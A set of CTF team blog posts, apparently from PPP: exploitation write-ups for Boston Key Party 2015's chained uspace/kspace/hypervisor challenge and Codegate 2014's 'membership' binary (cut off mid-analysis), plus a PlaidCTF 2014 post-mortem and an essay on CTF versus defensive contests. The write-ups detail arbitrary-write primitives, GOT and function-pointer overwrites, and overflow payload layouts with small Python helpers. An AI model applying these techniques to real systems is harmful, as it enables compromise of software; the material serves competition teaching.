[bkpCTF-2015] braintree (tz) write-up

=== If you have any trouble with poor formatting here, you can read the original post at this blog ===

This is a write-up for the braintree challenge, the last part of the three-part chained pwnable challenge from Boston Key Party CTF last weekend. You can read about the other parts here: quincy-center, quincy-adams.

The binaries were packaged into a tarball.

The MBTA wrote a cool system. It’s pretty bad though, sometimes the commands work, sometimes they don’t…
Exploit it. (tz flag) 54.165.91.92 8899

The goal is to get the “tz” flag by exploiting the tz (hypervisor) process.

If you haven’t read the previous write-up for quincy-adams, I strongly recommend reading it before continuing with this one, as we will assume knowledge gained from it.

 

As mentioned previously, we will be using the same primitive: hypercall #92.

Therefore, we have an arbitrary-write-anywhere primitive. So, the question is “what can we overwrite in tz that will get us arbitrary code execution?”

We started looking at each of the hypercall handlers in tz.

 

Then, we stumbled upon hypercall #85.

This function seemed to be some sort of cleanup function (we called it delete_op in our shellcode) for an object used in tz.
(As mentioned previously, we didn’t do as much reversing on tz as we did for uspace and kspace.)

It seems like the first argument (v3) is a word that represents an id of some sort, but the important thing is that we can control its value. v2 is an offset into the tz data structure, and the value at tz_space + v2 (where v2 is 0) is 0.

Since NX is enabled on tz, we decided to overwrite a GOT entry with the address of system. Since addresses are randomized, we first need to leak an address to calculate the address of system. We are going to abuse hypercall #92 to do three things:

  • Leak out libc address, so we can calculate the address of system.
  • Overwrite the GOT entry of free (.got.plt in tz) with &system.
  • Overwrite contents in v4 + 8 (aka, tz_space + 8) with a pointer to our command buffer.
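The leak-and-compute part of the plan can be sketched in Python; the libc offsets below are hypothetical placeholders, not the real values from the challenge's libc:

```python
# Sketch of computing &system from a leaked libc pointer.
# Both offsets are HYPOTHETICAL placeholders; the real values come from
# the libc shipped with the challenge.
OFFSET_LEAKED_SYMBOL = 0x083590   # hypothetical offset of the leaked symbol in libc
OFFSET_SYSTEM        = 0x046590   # hypothetical offset of system() in libc

def system_addr(leaked_ptr):
    """Rebase: libc_base = leak - known offset, then add system's offset."""
    libc_base = leaked_ptr - OFFSET_LEAKED_SYMBOL
    return libc_base + OFFSET_SYSTEM

# With a hypothetical leaked pointer:
print(hex(system_addr(0x7f1234583590)))
```

This is the standard ASLR-defeat arithmetic: one leaked pointer pins the library base, and every other symbol follows from its fixed offset.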

However, doing all of these comes at a price. The size limit (256 bytes) starts to become an issue here. We can either put another stager in the middle to allow us more space, or optimize our payload so that it fits under 256 bytes! We chose to do the latter :P

At first, we were over by ~10 bytes, but once we “optimized” a little, we finally got our payload down to 254 bytes!

Note that we are not reusing the same shell.asm as before (though our new payload is also called shell.asm). However, we can continue to use the same stage1.asm and the Python script from the kspace exploit. For convenience’s sake, they are also attached here.

 

We have abused the hypercall #92 (encrypt) to exploit both kspace and tz, but there may be another way to exploit kspace without going through the hypervisor.

Well, that’s it for the three-part pwnable challenge write-up =)

Thank you for reading, and happy hacking!

 

Write-up by Cai (Brian Pak) [https://www.bpak.org]

 

[bkpCTF-2015] quincy-adams (kspace) write-up


This is a write-up for the quincy-adams challenge, the second part of the three-part chained pwnable challenge from Boston Key Party CTF last weekend. You can read about the other parts here: quincy-center, braintree.

The binaries were packaged into a tarball.

The MBTA wrote a cool system. It’s pretty bad though, sometimes the commands work, sometimes they don’t…
Exploit it. (kspace flag) 54.165.91.92 8899

The goal is to get the “kspace” flag by exploiting the kernel space process.

 

Before we dive in, let’s look at what is really going on.

We can think of each process (tz, kspace, uspace) as a separate privilege ring, as their names suggest.

  • tz (TrustZone?) – a “hypervisor” layer that implements the “hypercalls” (we haven’t really reversed this too much).
  • kspace – a kernel layer that implements the “syscalls”; it maintains the files array and performs the actual tasks such as listing files, removing files, sleeping, and cat’ing (open & read).
  • uspace – a user layer that implements the interface that the user interacts with; it parses the commands and calls the appropriate “syscalls”.

We start from uspace to get arbitrary code execution on the uspace process (as we did in the previous write-up), then exploit kspace, which allows us to perform an attack against tz. Shared memory is arranged by tz such that each layer gets its own memory “space” to pass arguments to {sys,hyper}calls.

kspace syscall_handler (sub_401180)

 

We can see that the syscall number, which is stored at user_space[0], matches what we saw in uspace.

  • do_ls loops through the file_array list and prints out the name of the file.
  • do_rm finds the file in file_array with a given filename, and deletes it.
  • do_create adds a file into file_array, up to 16 files. It looks for a free slot in the array by checking whether the filename is null.
    This also initializes the file structure:

    • open_file, read_file, and delete_file are the function pointers.

      file struct

  • Note that syscalls 95 and 99 are sleep and exit, respectively, which are not that interesting :p
  • do_read finds the file in file_array with a given filename, and if the file is “open”, its content is copied to the output buffer (2nd argument).
  • do_open finds the file in file_array with a given filename, and changes its open state.
    • Only up to 9 files can be open simultaneously.

There is a bug in file creation and deletion: the number of files in the list gets incremented when creating a file, but it does not get decremented on deletion. Thus, we can only ever create up to 16 files, and we can’t create any more files even if we delete some. This didn’t really affect the exploitation, however :)
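The bookkeeping bug can be modeled in a few lines of Python (the names here are ours, not from the binary):

```python
# Minimal model of the create/delete bookkeeping bug: the file counter is
# incremented on create but never decremented on delete, so slots free up
# in the array while the counter still hits the 16-file cap.
MAX_FILES = 16

class FileTable:
    def __init__(self):
        self.files = [None] * MAX_FILES
        self.count = 0              # only ever goes up -- the bug

    def create(self, name):
        if self.count >= MAX_FILES:
            return False            # "table full", even though slots may be free
        for i, f in enumerate(self.files):
            if f is None:
                self.files[i] = name
                self.count += 1
                return True
        return False

    def delete(self, name):
        for i, f in enumerate(self.files):
            if f == name:
                self.files[i] = None   # slot is freed...
                return True            # ...but self.count is not decremented
        return False

t = FileTable()
for i in range(MAX_FILES):
    t.create(f"f{i}")
t.delete("f0")
print(t.create("again"))   # False: counter already at the cap
```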

If you followed carefully, you’d have noticed that we didn’t go over the mysterious syscall 92 (sub_402380).

This operation, unlike the others, does not process the user input/arguments here. Instead, it forwards them to tz via a “hypercall”.

syscall 92 (kspace)

 

To be more precise, the 3 arguments are stored starting at kernel_space + 48, and the hypercall takes 3 arguments of the hypercall number (92), 0, and the pointer to the arguments (kernel_space + 48).

So what does this hypercall do? Let’s take a look at tz binary now.

hypercall handler (tz)

As we can see above, sub_401560 is the hypercall 92 handler.
It doesn’t really do anything too fancy. The function performs a very simple “encryption” of data.

hypercall 92 handler

 

It basically XORs the bytes at src with the key “charlestown isn’t that skeytchy.” and stores the result at dest.

There is no restriction on the memory address for dest (other than a check against 0x100000000), which gives us an arbitrary (XOR) write. By preparing the src buffer with already-XORed values, we can write any value we want to any memory location.
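A minimal sketch of pre-encoding a write, assuming the XOR key is the 32-byte string quoted above:

```python
# Pre-"encrypt" a value so that hypercall 92's XOR pass produces exactly
# the bytes we want at dest. XOR is its own inverse, so encoding and
# decoding are the same operation.
KEY = b"charlestown isn't that skeytchy."   # XOR key from the tz binary

def xor_with_key(data: bytes) -> bytes:
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(data))

# The value we want written at dest (e.g. a function pointer)...
want = (0x90003E811).to_bytes(8, "little")
# ...is stored in src pre-XORed, so the handler's XOR undoes it:
src = xor_with_key(want)
assert xor_with_key(src) == want
```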

So, we can use this capability to overwrite a useful data structure (such as a function pointer) and gain arbitrary code execution!

Just like uspace, kspace has NX disabled, so we can put our shellcode somewhere and jump to it.

 

The attack plan is as follows:

  1. Create a file, with the content being the shellcode we want to run as kernel.
  2. Overwrite a function pointer (open_file) for the first file (which is the one that we just created in step 1) with the pointer to our shellcode.
    • The file_array is located at kernel_space + 0x3E800 == 0x90003e800.
    • According to our struc_files struct, file_array + 0x8 points to the files array.
    • Thus, the first file structure will be located at 0x90003e808 and according to our struc_file, its content is located at the offset +0x9.
    • The first file’s content == shellcode == 0x90003e800 + 0x8 + 0x9 == 0x90003e811.
    • The first file’s open_file function pointer is at +0x118 from the file structure, which makes its location 0x90003e920.
  3. Invoke a syscall #93, which opens a file.
    • At this point, we will tell it to open our file which has corrupted open_file function pointer — thus, calling into our shellcode.
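As a sanity check, the address arithmetic from step 2 of the plan works out:

```python
# Address arithmetic from the attack plan above.
KERNEL_SPACE = 0x900000000
file_array   = KERNEL_SPACE + 0x3E800        # 0x90003e800
first_file   = file_array + 0x8              # files array starts at +0x8
content      = first_file + 0x9              # file contents at +0x9
open_file_fp = first_file + 0x118            # open_file function pointer

print(hex(content))       # 0x90003e811 -> where the shellcode lands
print(hex(open_file_fp))  # 0x90003e920 -> what we overwrite
```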

Note that since we are using syscall #92 (encrypt) to perform the arbitrary write to memory, we have to “encrypt” the value we want to write beforehand so that it gets “decrypted” on write. The filename we used is “lol”.

Our exploit code looks fairly similar, but we now create a file called ‘lol’ first with the shellcode. (The shellcode is the same as what we used for uspace.)

Then, we trigger the bug with our stage1 code.

 

So far, we have triggered a uspace bug to call a syscall (92) in kspace, which does a hypercall (92) in tz, which allowed us to perform an arbitrary memory write in kspace memory.

Amusingly, we will be using the same primitive to get a shell under tz context in the next series.

 

Write-up by Cai (Brian Pak) [https://www.bpak.org]

 

[bkpCTF-2015] quincy-center (uspace) write-up


This is a write-up for the quincy-center challenge, the first part of the three-part chained pwnable challenge from Boston Key Party CTF last weekend. You can read about the other parts here: quincy-adams, braintree.

The binaries were packaged into a tarball.

The MBTA wrote a cool system. It’s pretty bad though, sometimes the commands work, sometimes they don’t…
Exploit it. (uspace flag) 54.165.91.92 8899

The goal is to get the “uspace” flag by exploiting the user space process.

Looking at the output of file, these are all x86_64 binaries.

Opening up in IDA Pro, we see that sub_401470 has the process loop that prompts “bksh> ” like a shell environment.

bksh (uspace) command line parser

 

First, we see that there are semaphore locking/unlocking for I/O operations, which don’t seem to be too important at the moment. Then, the code to parse the command follows.

The general scheme for how the system works will be explained in the next series (kspace), so we will leave out the details of how things are implemented and maintained for now. Understanding the operations (create, list, remove, etc.) abstractly is good enough for exploiting the user space :)

There are a total of 6 commands it understands: ls, create, rm, cat, sleep, and exit.

  • ls – lists files on the system
  • create – creates a new file on the system
  • rm – deletes a file on the system
  • cat – prints the contents of a file on the system
  • sleep – sleep…
  • exit – exits the shell

Let’s look at what create does for us.

The function takes the first argument to the command as the file name, and reads 256 bytes from the user for the contents of the file being created. The buffer being read into is large enough, so there’s no overflow here. Then, it “calls” into the kernel “syscall” (via shared memory) with syscall number 96 and its two arguments (file name & contents buffer). Everything seems normal and sane, so we move on.

create syscall (from uspace to kspace)

 

Looking through more functions, we find vulnerable code in cat, where it uses sprintf with the file contents buffer as the format string (i.e., a trivial stack buffer overflow).

“cat” operation (open syscall followed by read syscall)

 

v12 is a 256-byte stack buffer located at bp-0x118. Also, we noticed that NX was disabled on this binary, so we could easily jump to our buffer (such as one of our arguments for the command). Conveniently, pointers to our arguments are on the stack, so a simple pop/pop/ret gadget gets us arbitrary code execution :D
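A sketch of what such a payload layout might look like; the gadget address is a hypothetical placeholder, and a real exploit would find a pop/pop/ret in the binary:

```python
import struct

# Sketch of the overflow payload for the 256-byte stack buffer at bp-0x118.
# The gadget address is a HYPOTHETICAL placeholder, not from the real binary.
BUF_TO_SAVED_BP = 0x118
POP_POP_RET = 0x400D06          # hypothetical pop/pop/ret gadget address

payload  = b"A" * BUF_TO_SAVED_BP           # fill the buffer up to the saved bp
payload += b"B" * 8                          # saved bp (value doesn't matter)
payload += struct.pack("<Q", POP_POP_RET)    # return into pop/pop/ret, which
                                             # skips two stack slots and then
                                             # returns into an argument pointer
                                             # (pointing at our shellcode)
print(hex(len(payload)))   # 0x128 bytes total
```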

We successfully got a shell as the uspace user.
(Note that since the challenge servers are down, the exploitation is shown in a local setup.)

Once we have arbitrary code running in uspace, we can perform syscalls that are exposed by the kernel but not available through the user-space interface (such as syscall number 92, shown below).

kspace syscall handler

The analysis of kspace & tz will be continued on the next post.

 

Write-up by Cai (Brian Pak) [https://www.bpak.org]

 

PlaidCTF 2014 – Website post-mortem

First, we would like to thank everyone for participating in PlaidCTF 2014. Thanks to all of you, this year was bigger than ever, with over 850 teams participating and 3 sponsors (THANK YOU!) providing $14K in cash prizes and covering all of our operating costs. Congratulations go out to 0xffa, Dragon Sector, and MoreSmokedLeetChicken for finishing in 1st, 2nd, and 3rd. We hope everyone had a lot of fun with the challenges and maybe learned a thing or two, as well.

Now, as everyone who played pCTF this year noticed, things got off to a very rocky start. This was very disappointing for us because we spent a lot of time this year building a simpler interface that would be more usable and, we hoped, more stable. It turns out that we had a few mistakes materialize during the CTF, some nastiness with a particular WSGI server, and more teams than ever before.

The first issue that came up was with our frontend / caching server. Like previous years, we used nginx to serve the static files, but unlike previous years, we also used nginx as the caching layer instead of varnish. This turned out to be a fatal error because nginx does not support the standard Vary HTTP header, which is used by the backend to distinguish between pages that should be cached based on the cookie and those that should not. As such, all pages were cached without the cookie which meant a user might see a different team’s page instead of their own. As a quick fix, we added the cookie header to the cache key, but now all of the pages that we thought would be regenerated once per second needed to be regenerated once per second per team. And as I will discuss later, we had a lot of teams.

The second issue, and the one that ended up consuming a lot of our time and causing the most frustration, was a strange interaction between nginx and gunicorn. This year we stuck to a pretty standard setup: django + gunicorn + nginx. Unfortunately, due to high load, or other factors that we are still unaware of, gunicorn was hanging on a recvfrom call on its socket. The problem mysteriously fixed itself a couple hours into the competition, but then came back an hour or so later. At that point, we started replacing parts of our infrastructure (e.g. nginx -> Apache, gunicorn -> uwsgi). The working setup ended up being uwsgi + nginx, but it took us a couple of hours to get to this point. Now, the backend worker processes were no longer hanging and the website was mostly working except for some load issues.

As I mentioned above, we had more teams this year than ever before, with over 850 teams solving the trivial sanity-check key. Once the nginx caching was working properly, we found that we were still overloaded during the voting phases, so we brought up another copy of the www server and used an Elastic Load Balancer as the new frontend. I would like to thank Amazon for making its load balancer very easy to set up, use, and monitor. After this, all load issues were resolved and the website continued to be stable for the rest of the competition. We lost IP address information for the majority of the competition because we were not logging the X-Forwarded-For header, but that was a small price for having a working website.

Requests per minute processed by the Elastic Load Balancer

There were two other bugs in the game logic that we fixed over the course of the 48 hours. The first was an issue with database transactions in Django. The default isolation level for the PostgreSQL database backend was “Read Committed”, which resulted in transaction interleaving and allowed teams to submit the same key multiple times. We resolved the issue by changing the isolation level and enforcing uniqueness of (team_id, problem_key_id) in the database. The other issue was related to the “chance” tiles. During the first half of the competition, it was impossible for the “chance” tile to return anything besides “Unlucky!” Once we resolved the problem, we changed the probabilities to compensate for the lost attempts.

All in all, we think the competition went well and we thank everyone for their patience. Every year we try to do something a bit different to keep things interesting and with that comes some untested infrastructure. I assure you that we continue to learn from these mistakes and will continue to work hard to improve the competition for next year.

– awesie on behalf of PPP

Why CTF

A recent blog post has been going around talking about the differences between competitions like CCDC (Collegiate Cyber Defense Competition) and CTFs (Capture the Flag). It’s a good read and I thought a lot of interesting points were brought up, and figured it could be beneficial to try to respond to them some place to encourage discussion (and besides, our blog needs any excuse it can get for new content). For what it’s worth, I didn’t watch Chris Eagle’s presentations, though I imagine I don’t agree with everything he said. Likewise, I don’t disagree with everything from Matt Weeks’ blog post. This post is mostly motivated by the fact that while a discussion on security competitions is going, it makes sense to talk about some related things I have been thinking about.

First off, as many of you probably know, the Plaid Parliament of Pwning has not played in purely defensive exercises. To those that may say “well aren’t you going to be biased towards capture the flag events?”, I answer “almost certainly”. I’m not going to say CCDC is worthless and CTFs are the epitome of security education, but my claim is that CTFs provide a much better platform and environment for players learning about a broad range of security topics. Further, I’m going to use the term CCDC when I suppose in general I mean “defensive security competition”. This probably means I will muddle some specific details.

1. Problem Solving

Fundamentally, CTFs are about problem solving. Although I know defensive competitions have many problems that their competitors have to deal with, I believe CTFs intrinsically allow for more “out of the box” thinking. Let’s start with rules. Most CTF competitions are pretty loose in this respect: maybe team size is limited, competitors aren’t allowed to share answers, and attacking game infrastructure is forbidden, but that’s about it. The nature of defensive competitions means they can’t be so simple. Although the rules for CCDC aren’t too bad, the rule book for the CyberPatriot competition is over one hundred pages long. There’s a reason for this: there are “easy solutions” that would break these competitions. What if you block malicious network ranges? Set up a honeypot? Rewrite services to be bug-free? Delete user accounts only the red team is using? Proxy all traffic through an IPS? Upgrade Windows XP boxes to Windows 7? Run separate services in sandboxes?

Yes, not all of these options are feasible in the real world in every scenario: they may be expensive, or constrained by some other resources. But what is the lesson here? If you are put in a real-world situation, are all these solutions blocked just like in a competition? Of course not! You need to evaluate the merits and consequences of each one and decide for yourself. In most defense competitions, these decisions are made for you, and that limits your ability to think out of the box. In many cases, teams that succeed at CCDC do so because they manage to get as out of the box as possible. This ends up meaning they “game the game” rather than practice good security. For example, maybe you aren’t allowed to delete users on a system, because in the real world that would restrict the ability of legitimate users to access the system. Fine, change all their passwords to a 100-character hex string. The real-world value of this isn’t any better, but it is more acceptable to do in CCDC.

In a Capture the Flag contest, just about anything goes. Over the years I’ve seen crazy hacks to get things working and working quickly: dumping memory by patching in a jump to MessageBox, reverse image searching to find plausible ECC bits for broken QR codes, forcing a core dump and using a file carver to extract files from obfuscated programs… The type of thinking and problem solving promoted by CTFs is fundamental to what it means to be a security researcher.

2. Feedback

When reading through some comments about the CCDC post, I came across someone complaining about the lack of transparency in CCDC. Although this may not be a universally held opinion, it doesn’t apply to Capture the Flag events. Let’s look closely at the procedure for earning points in both:

  1. Solve problem
  2. Submit problem to score server
  3. Observe scoreboard add points or not

Scoring system in CTF

  1. Maintain service uptime and fend off the Red Team
  2. Complete “injects” (business tasks)
  3. Write reports documenting injects and attacks
  4. Submit reports to organizers to get points and reduce deductions
  5. Wait until end of competition to see final standings

Scoring system in CCDC

Okay, so why is this important? First, scoring in a CTF is objective: there are no reports to be read and graded, and there is instant feedback to verify the system works correctly. What this means is CTF problem solving can be an iterative process: attempt a solution in a particular way, see the results, and modify your behavior accordingly. If you read about the importance of feedback in learning, you’ll notice a few things CTFs do right: feedback is immediate, feedback is individual (both on a problem and team basis), and feedback isn’t final (if you get a flag wrong, try, try again).

Let’s contrast this with a defense competition. Feedback is not immediate at all: sometimes a team standing is updated daily, and sometimes not until the end of the competition! Feedback is not granular: your team might get a final score at the end of the competition, but it’s not clear where your points came from. Even if points are broken down by advisories, SLA, and so forth, it’s not clear which actions are being reinforced. Finally, feedback isn’t iterative. Although you may be able to fill out a form to request a regrade on a report, you can’t just submit a bunch of reports and use the best one.

One might argue: the real world doesn’t provide immediate feedback, isn’t objective, and isn’t always fair, so defense competitions are a better approximation of real scenarios! There is a lot of truth to this: CTFs aren’t depicting day-to-day scenarios of system administrators or work in a security operations center. But you know what? That’s kind of the whole point, and what makes CTFs fun.

3. Fun

I’ll admit outright, “fun” is clearly not universal. I know people out there think blocking exploits is far more fun than throwing them, but let’s be honest, this isn’t a popular opinion. Heck, even the NCCDC website talks about how much cooler the Red Team is than the contestants. Again, “well the real world isn’t always fun”. Fine. But if your goal is to encourage people to learn and try new things, is the best way to do it really to throw them into the middle of a hostile network, or would it be better to give them fun tasks that guide them through the learning process?

From the NCCDC website

Red teaming sure sounds a lot more fun than “getting OWNED”

Jeopardy-style CTFs are a lot of fun. They’re relaxing: you sit down and solve problems. Does this emulate high-stress real-world scenarios in hostile networks? No, but that’s not a fun learning environment. Defcon CTF is not a place for beginners. I am not sure how someone could argue that a teaching method that is less fun could ever be superior.

Of course, not all people like breaking things. That’s fine. Capture the Flags aren’t always about binary exploitation. There are plenty of forensics, programming, cryptography, and other skills that involve building things. The only CCDC skills I have not seen in a CTF are writing reports and running updates. Looking for backdoors and malicious software, finding intrusions in log files, changing default settings, and modifying web applications are all things that have shown up in CTFs (though I admit those aren’t the kind of tasks that I enjoy).

4. The “1%”

One of the points that struck me on the blog post regarding CCDC was the idea of appealing to the “1%”. Restated simply, the claim is that CCDC makes use of skills that 99% of security workers will use while CTFs really only teach 1% of relevant skills. The numbers aren’t really important here, but the sentiment is. Skills like writing reports, reviewing log files, and running updates are the sort of skills most “security workers” will use. Blech. What is that really saying? To get a job as a security worker I don’t need to understand ASLR bypass techniques, NTFS alternate data streams, or CBC Padding Oracle attacks? Yes, that is probably true! That writing a report is more valuable than understanding modern offensive security? Perhaps! But personally, I think that if CCDC claimed the reason it is a superior platform to CTFs is because it involves writing more reports and running Windows update, people would start losing interest. Why not just participate in a technical writing contest? Do we really need a contest which stresses the most mundane aspects of security?

It is probably worth mentioning that some CTFs also require contestants write up solutions. In one instance of RuCTF (2009), players could receive points for patches or writeups of vulnerabilities. Many CTFs with prizes or final rounds also require a writeup be submitted from teams that place. Some competitions also give separate prizes for highest points/first to complete challenges, and best writeup. Still, I think it is fair to say that writing reports is stressed much more in CCDC than CTF events, for better or for worse.

The fact of the matter is that students wanting to learn security are told they should participate in competitions like CCDC. And sure, security is heavily involved in these competitions, but not at the same level as in CTFs. If someone wants to learn about security, I think it’s pretty clear a CTF is a better avenue than a defensive contest. This is important to me because I often come across people who want to get jobs in security and so they play in CCDC. Although I think it’s wonderful for them to take that initiative, I can’t help but feel that their time would be much better spent playing a CTF.

One thing I have heard oft-repeated, which I whole-heartedly agree with, is that in defense you are always playing catch-up. Unless you think as an attacker, you can only react to known vulnerabilities, and so you are always a step behind. The CCDC approach seems to be to focus on defense, and to succeed you will probably learn something about attacks; the CTF approach is that you should focus on attacks, as the defense comes naturally afterwards. I would posit that the top CTF players would be better suited to defending a network against advanced attackers than the top CCDC players, for precisely this reason.

Aside from all this, I think everyone would be much safer if security professionals knew more about the 1% that they so rarely see. Maybe if the person reading the IDS logs knew more about writing polymorphic shellcode than what is in Metasploit, they’d be better prepared to prevent threats more advanced than someone using Shikata ga nai.

5. Conclusion

Both CCDC and CTFs address different goals. As far as I can tell, CCDC’s goal is to assess how well someone can administer and document systems, while CTFs focus on teaching security. Both of these have their place. But telling fledgling security professionals that the better way to learn is through CCDC seems dishonest, and forces them into a niche they might not enjoy. Although the skills taught in CTFs are not always used day-to-day, they cover a far broader range of security topics that are relevant to anyone working in the security field. As someone who tries to promote the value of CTFs, it’s important to me that those interested in security education recognize that CTFs are an incredibly powerful tool and should be encouraged where possible.

-tylerni7

Codegate 2014: membership (800pt pwnable) write-up

This is a write-up for the 800-point pwnable challenge ‘membership’ from the Codegate CTF 2014 pre-qual round. PPP was the only solver for this challenge during the competition, so I have decided to do a write-up for it. Enjoy. (awesie and ricky solved it during the competition.)


1. Challenge overview

You can download the copy of the binary here.
During the competition, we could ssh into one of their machines to exploit and read the flag.

membership_problem

As you can see, it’s a 32-bit ELF binary. So, let’s open it up in IDA and start reversing.

The program looks really simple. It just installs a couple of signal handlers (specifically for SIGSEGV and SIGFPE) and calls the main (interesting) function, where it prompts us for a userid and password. Then, the program calculates the SHA256 hash of the given password and compares it with the stored hash. If the password hashes do not match, a runtime error exception is thrown and the program is aborted. If we pass in the correct password, we get a shell :)

Since guessing the correct password or cracking the hash is not a viable option for us, we try to locate some other bugs that can be useful.

As highlighted above, the program dereferences a null pointer (*0 = 0) if the length of the password is greater than or equal to 16 bytes. Obviously this is going to trigger SIGSEGV, but do you remember what we said earlier about installing the signal handlers? Yes, one of them was the SIGSEGV handler.

So, instead of crashing it miserably, the handler will be called.
Let’s examine what this handler does.

SIGSEGV handler installer

Now, if we look at the SIGSEGV_handler, we may think it doesn’t really do anything useful.
Note that it just fills in the exception information and calls __cxa_throw to throw the exception.

At this point, we could go on and explain what SIGFPE_handler does as well, but we’ll skip it since it’s not that interesting and is not needed for a successful exploitation.
You may ask… so, what’s left?

 

2. Vulnerability

Notice that this is a C++ program that throws exceptions. We should check how C++ exception handling works.

It uses a thing called DWARF, a standardized debugging data format, for unwinding the stack and handling exceptions.

There was a CTF problem in the past that involved DWARF (called Khazad from Ghost in the Shellcode 2012): Check out these write-ups if you are interested!

Anyways, the DWARF information can be displayed using binutils tools such as objdump or readelf:

Take a close look at the entry with “pc=08048fa7..0804904d”.
This entry basically describes what should happen when an exception is thrown within that PC range. Note that the SIGSEGV_handler throws an exception at 0x0804901A, which is in that range (the range is precisely the SIGSEGV_handler function).

Ok. Now, we have to make sense of what all those operations mean :)
DW_CFA_val_expression contains CFA expressions, which are defined here.

Luckily, it’s not that hard to understand the expressions. We can simply think of it as a stack machine:
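To give a flavor of that, here is a toy stack-machine evaluator; the opcode names are simplified stand-ins, not the real DW_OP_* encodings:

```python
# Toy stack machine in the spirit of DWARF CFA expressions. The opcode
# names are simplified stand-ins, not real DW_OP_* encodings.
def evaluate(ops):
    stack = []
    for op, *args in ops:
        if op == "const":          # push a literal
            stack.append(args[0])
        elif op == "dup":           # duplicate the top of the stack
            stack.append(stack[-1])
        elif op == "plus":
            b, a = stack.pop(), stack.pop()
            stack.append(a + b)
        elif op == "eq":            # compare, push 1 or 0
            b, a = stack.pop(), stack.pop()
            stack.append(1 if a == b else 0)
        else:
            raise ValueError(f"unknown op {op}")
    return stack[-1]                # result is the top of the stack

# ((2 + 3) == 5) -> 1
print(evaluate([("const", 2), ("const", 3), ("plus",), ("const", 5), ("eq",)]))
```

The real expressions in the binary work the same way, just with memory dereferences and branches mixed in, which is how they compare the username and password bytes.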

So, in short, it checks whether the username is “stdchpie” and password[2:5] is equal to “\xb1\x2e\x40”.
If any of the conditions fail, it transfers execution to 0x8048f18, which does exit(0).

What happens if we satisfy the conditions? Good question.
It basically dumps us to the following code:

This code prints out the “nested” string and writes password[5:9] to *password[1:5]. Meaning, we get to write any 4-byte value we choose anywhere in the 0x402eb1?? address range. A 4-byte write is a pretty strong tool in exploitation, but when we are limited to a 256-byte range, it’s difficult to make it useful. Also, it immediately jumps to 0x8048cc0, where another null pointer dereference causes a SIGSEGV; thus, we get the ‘nested’ string printed in an infinite loop.

Alright. Let’s summarize what we know and have so far.

  1. We can trigger a null pointer dereference, causing SIGSEGV handler to get executed (and thus, DWARF CFA expressions), by sending a password that’s >= 16 bytes.
  2. With a carefully constructed password, we can write any 4-byte value to any address between 0x402eb100 and 0x402eb1ff.
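As a sketch, the write primitive above can be wrapped in a small helper. The layout (address in password[1:5], value in password[5:9]) follows the description above; the helper name and padding bytes are our own choices:

```python
import struct

# Sketch of the 4-byte write primitive. password[1:5] is the
# little-endian target address (0x402eb1XX), so password[2:5]
# automatically becomes "\xb1\x2e\x40" and passes the check;
# password[5:9] is the value written there.
def make_password(addr, value):
    assert addr & 0xFFFFFF00 == 0x402eb100, "target must be 0x402eb1XX"
    pw  = b"A"                       # password[0]: don't care
    pw += struct.pack("<I", addr)    # password[1:5]: target address
    pw += struct.pack("<I", value)   # password[5:9]: value to write
    pw += b"B" * (16 - len(pw))      # pad to >= 16 bytes to trigger SIGSEGV
    return pw

pw = make_password(0x402eb118, 0x40025000 + 0x1c)
assert pw[2:5] == b"\xb1\x2e\x40"    # the magic bytes fall out of the address
```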

The natural question is, then, what is mapped on that memory address?
With ulimit -s unlimited ,

As we can see above (highlighted), the address range falls into libgcc‘s memory; specifically, it matches a portion of its .bss section.

So, what is there in libgcc_s.so.1, you ask.

Precisely, this.
And that’s it.

At this point, we downloaded and opened up libgcc source code to look at where some of these data structures are used, and tried to look for ways to get an EIP control.

So the journey begins.

3. libgcc source code analysis

Note that this step took the longest since we had to actually understand part of the gcc code when it does stack unwinding and handling the exception.

You can download the source for gcc here (gcc-4.8.1, Ubuntu 13.01).

During the competition, we chose each data structure of interest and traced backwards to find out whether by controlling said structure we can influence anything (e.g. function pointer) on callers while handling exceptions to hijack the control flow.

Since we now know which one can be used to control EIP, we will start from there: frame_hdr_cache_head is our target. [It may very well be possible to solve the challenge with a different method/structure, but this is the one that we ended up using during the CTF.]

If we locate the place where frame_hdr_cache_head is referenced, we land in the middle of the _Unwind_IteratePhdrCallback function in libgcc/unwind-dw2-fde-dip.c.

frame_hdr_cache_head points to the first element of a singly linked list that contains frame_hdr_cache_element(s).
The code iterates through the list and finds the entry for data->pc  in cache. data->pc  is the program counter of the frame we are trying to handle the exception for.

This cache is filled in as the program discovers exception handler frames (eh_frame).

The following is the struct definition for frame_hdr_cache_element:

So, if we control where frame_hdr_cache_head points to, we can also construct/control the elements inside. Before we dive into what happens when we find an element in the cache and ‘goto found‘, let’s step back for a minute and see if we can even get to here and what that allows us to do.

The function we just looked at (_Unwind_IteratePhdrCallback) is called from _Unwind_Find_FDE in unwind-dw2-fde-dip.c.
Then, _Unwind_Find_FDE function is called from uw_frame_state_for function in unwind-dw2.c.
uw_frame_state_for function is called from _Unwind_RaiseException function in unwind.inc, which provides an interface to raise an exception given an exception object.

Where does _Unwind_RaiseException get called, then?
It gets called by __cxa_throw, and if you remember, our SIGSEGV_handler invokes this function to raise an exception.

Alright. We have now confirmed that we can get to that code by causing the binary to throw an exception and letting libgcc unwind/handle it.

But is there anything interesting in this code path that can give us EIP control? Yes.

Let’s review _Unwind_RaiseException a little bit:

Notice the highlighted lines. What do you see?

A function pointer getting called! And we *may* be able to control fs.personality .
Let’s find out!

Remember that the struct pointer that we are interested in tracing is fs (aka 2nd argument).
We see here that _Unwind_Find_FDE is used to get fde (which is used to get cie), and extract_cie_info takes cie and fs as its first and third arguments, respectively.

So, what happens in extract_cie_info?

Cool.
extract_cie_info parses cie and updates fs->personality . We’ll work out the details later.

Okay, now, we have to look into _Unwind_Find_FDE function to find out what it returns (fde) is:

As we discussed earlier, _Unwind_Find_FDE calls _Unwind_IteratePhdrCallback, which fills the data struct.
Then, it returns data.ret.

Whoa. After that chain of functions, we now came back to where we started — _Unwind_IteratePhdrCallback.
Warning: This is a really long function :p

To show a good idea of the call stack, here’s a diagram:

Fortunately, we do not have to look at all of its details. As we learned earlier, the cache for eh_frame_hdr is looked up and the following is performed in case the entry was found:

Note that data->ret is set to f on line 415, where f is an FDE pointer found by performing a binary search.
Comments from unwind-dw2-fde.h briefly describe the FDE & CIE lookup:

Let’s review some of the primitive structs and functions that are used in above code to get a better understanding of what’s going on. We will make references to these as we explain the code later.

And, these are some functions that are used when parsing data:

That was a lot of stuff, but don’t worry about understanding/remembering all of it, since we will go over the logic at a somewhat high level.

When an exception is thrown, the PC is looked up to find a correct FDE for the current function.

  1. First, the shared library cache linked list (whose head pointer we control) is searched.
